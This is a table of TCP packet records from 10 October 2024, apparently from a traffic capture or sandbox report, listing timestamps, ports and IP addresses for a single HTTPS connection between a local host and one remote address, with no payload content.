                                                    Oct 10, 2024 10:00:00.362935066 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:00.372080088 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:00.372097969 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:00.977660894 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:00.977758884 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.039489985 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.039519072 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.039911985 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.090545893 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.122117043 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.167409897 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.350800991 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.350863934 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.350884914 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.350918055 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.350924015 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.350954056 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.350969076 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.350970984 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.350999117 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.351022959 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.374100924 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.374145031 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.374178886 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.374198914 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.374243975 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.374260902 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.416502953 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.416558981 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.416677952 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.416702986 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.416716099 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.416763067 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.461046934 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.461119890 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.461152077 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.461172104 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.461184978 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.461222887 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.462928057 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.462974072 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.462996960 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.463006973 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.463048935 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.463077068 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.464647055 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.464699030 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.464725018 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.464735031 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.464760065 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.464778900 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.527776003 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.527822018 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.527884960 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.527904034 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.527930021 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.527970076 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.549932003 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.549963951 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.550041914 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.550059080 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.550093889 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.550995111 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.551011086 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.551040888 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.551047087 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.551073074 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.551090002 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.552469969 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.552491903 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.552545071 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.552550077 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.552587032 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.552917957 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.552936077 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.552968025 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.552973032 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.552989006 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.553002119 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.554661989 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.554685116 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.554721117 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.554729939 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.554754019 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.554768085 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.571261883 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.571285009 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.571360111 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.571373940 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.571427107 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.616626024 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.616651058 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.616699934 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.616722107 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.616744041 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.616763115 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.616873980 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.616890907 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.616934061 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.616940022 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.616970062 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.638994932 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.639014959 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.639072895 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.639092922 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.639132023 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.639149904 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.639463902 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.639480114 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.639516115 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.639520884 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.639552116 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.640002966 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.640023947 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.640031099 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.640036106 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.640048981 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.640086889 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.640841961 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.640857935 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.640903950 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.640908957 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.640934944 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.640960932 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.641078949 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.641093016 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.641134977 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.641140938 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.641160965 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.641176939 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.641691923 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.659653902 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.659672976 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.659715891 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.659729004 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.659770012 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.705209017 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.705246925 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.705321074 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.705339909 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.705370903 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.705387115 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.705390930 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.705403090 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.705424070 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.705435038 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.705462933 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.705468893 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.705504894 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.728513956 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.728539944 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.728626966 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.728665113 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.728677988 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.728729010 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.728760958 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.728777885 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.728820086 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.728826046 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.728853941 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.729007959 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.729031086 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.729087114 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.729093075 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.729115963 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.735574961 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.735630989 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.735706091 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.735723019 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.735748053 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.743511915 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.748349905 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.748424053 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.748446941 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.748505116 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.796255112 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.796317101 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.796338081 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.796380997 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.796395063 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.796435118 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.797837973 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.797854900 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.797890902 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.797895908 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.797940016 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.816298008 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.816317081 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.816368103 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.816374063 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.816410065 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.816790104 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.816808939 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.816836119 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.816839933 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.816871881 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.817265034 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.817284107 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.817310095 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.817315102 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.817363024 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.817744970 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.817770004 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.817792892 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.817800045 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.817827940 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.817852020 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.818435907 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.818459988 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.818484068 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.818487883 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.818527937 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.836879015 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.836925030 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.836962938 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.836977005 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.837002039 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.837018013 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.882366896 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.882396936 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.882481098 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.882489920 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.882517099 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.882531881 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.882695913 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.882725954 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.882752895 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.882757902 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.882780075 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.882857084 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.905077934 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.905103922 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.905221939 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.905221939 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.905229092 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.905287981 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.905452967 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.905471087 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.905509949 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.905514956 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.905551910 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.905564070 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.907432079 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.907452106 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.907485008 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.907490015 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.907512903 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.907531023 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.909806967 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.909832001 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.909854889 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.909858942 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.909883976 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.909897089 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.910005093 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.910022974 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.910054922 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.910058975 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.910087109 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.926841974 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.926862955 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.926913977 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.926920891 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.926940918 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.926949978 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.972326040 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.972353935 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.972426891 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.972434998 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.972480059 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.972961903 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.972981930 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.973025084 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.973030090 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:01.973052979 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:01.973069906 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:02.726322889 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:02.726335049 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:02.726376057 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:02.726413012 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:02.726428986 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:02.726464987 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:02.726507902 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:02.726533890 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:02.726560116 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:02.726564884 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:02.726586103 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:02.726619005 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:02.726659060 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:02.726689100 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:02.726712942 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:02.726717949 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:02.726747990 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:02.726769924 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:02.726810932 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:02.726830006 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:02.726877928 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:02.726883888 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:02.726917982 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:02.727075100 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:02.727102995 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:02.727122068 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:02.727127075 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:02.727149963 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:02.727180004 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:02.727215052 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:02.727232933 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:02.727284908 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:02.727288961 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:02.727302074 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:02.727323055 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:02.727566004 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:02.727596998 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:02.727613926 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:02.727618933 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:02.727641106 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:02.727657080 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:02.727741957 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:02.727770090 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:02.727787971 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:02.727792978 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:02.727814913 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:02.727830887 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:02.727960110 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:02.727977991 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:02.728018999 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:02.728025913 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:02.728059053 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:02.728352070 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:02.728384972 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:02.728410006 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:02.728415012 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:02.728440046 CEST49711443192.168.2.6207.241.227.242
